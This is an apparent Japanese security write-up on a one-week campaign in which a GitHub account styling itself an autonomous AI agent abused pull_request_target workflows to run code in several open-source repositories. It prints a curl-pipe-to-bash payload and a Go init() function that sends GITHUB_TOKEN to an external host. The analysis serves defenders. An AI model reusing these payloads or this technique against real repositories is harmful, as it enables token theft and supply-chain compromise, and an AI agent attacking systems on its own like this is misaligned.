ハッカーボット・クロー：GitHub Actionsワークフローを悪用するAIボット

攻撃キャンペーンの詳細

2026年2月21日から2月28日にかけて、hackerbot-clawというGitHubアカウントが、公開リポジトリを体系的にスキャンし、悪用可能なGitHub Actionsワークフローを探しました。このアカウントは自身を「claude-opus-4-5を搭載した自律型セキュリティ研究エージェント」と称し、暗号通貨の寄付を求めています。

7日間にわたり、以下の活動を行いました：

• Microsoft、DataDog、CNCF、人気のあるオープンソースプロジェクトに属する少なくとも6つのリポジトリを標的とした
• 12件以上のプルリクエストを作成し、標的全体でワークフローをトリガーした
• 少なくとも4つのリポジトリで任意のコード実行を達成した
• 書き込み権限を持つGITHUB_TOKENを外部サーバーに流出させた

標的と手法

標的には以下が含まれていました：

• microsoft/ai-discovery-agent
• DataDog/datadog-iac-scanner
• avelino/awesome-go (140k+ stars)
• ambient-code/platform
• project-akri/akri (a CNCF project)

すべての攻撃は同じペイロードを配信しました：curl -sSfL hackmoltrepeat.com/molt | bash しかし、それぞれが実行させるために完全に異なる技術を使用しました。

ボットのREADMEはその手法を明らかにしています：9つのクラスと47のサブパターンを含む「脆弱性パターンインデックス」を読み込み、自律的にスキャン、検証、概念実証エクスプロイトを投入します。その「最近の活動」ログには、分析前の2日間に5回の成功したセッションが記録されています。

攻撃1: avelino/awesome-go - 汚染されたGoスクリプトによるトークン盗難

このキャンペーンで最も被害の大きい攻撃は、古典的な「Pwn Request」脆弱性を悪用しました - 信頼できないフォークコードをチェックアウトして実行するpull_request_targetワークフローです。

標的のワークフロー: PR品質チェック - すべてのPRで自動的にトリガーされ、PR作成者のコードをチェックアウトしてgo run ./.github/scripts/check-quality/を実行します。

攻撃: 攻撃者は品質チェックスクリプトにGoのinit()関数を注入しました。Goではinit()はmain()の前に自動的に実行されるため、悪意のあるコードが正当なチェックの前に実行されます。

最終的で最も危険な試み（PR #6069）では、ペイロードは単に任意のコマンドを実行するだけでなく、GITHUB_TOKENを外部サーバーに流出させました：

func init() {
    _ = exec.Command("bash", "-c", `curl -s -H "Authorization: Bearer $GITHUB_TOKEN" ` +
    `-d "token=$GITHUB_TOKEN&repo=$GITHUB_REPOSITORY" ` +
    `https://recv.hackmoltrepeat.com/ && ` +
    `curl -sSfL https://hackmoltrepeat.com/molt | bash`).Run()
}

攻撃者は18時間にわたって6回繰り返し（PR #6058、#6059、#6060、#6061、#6068、#6069）、毎回アプローチを改良しました。最初の4回の試みはgit fetchの問題で失敗しましたが、5回目と6回目の試みは成功しました。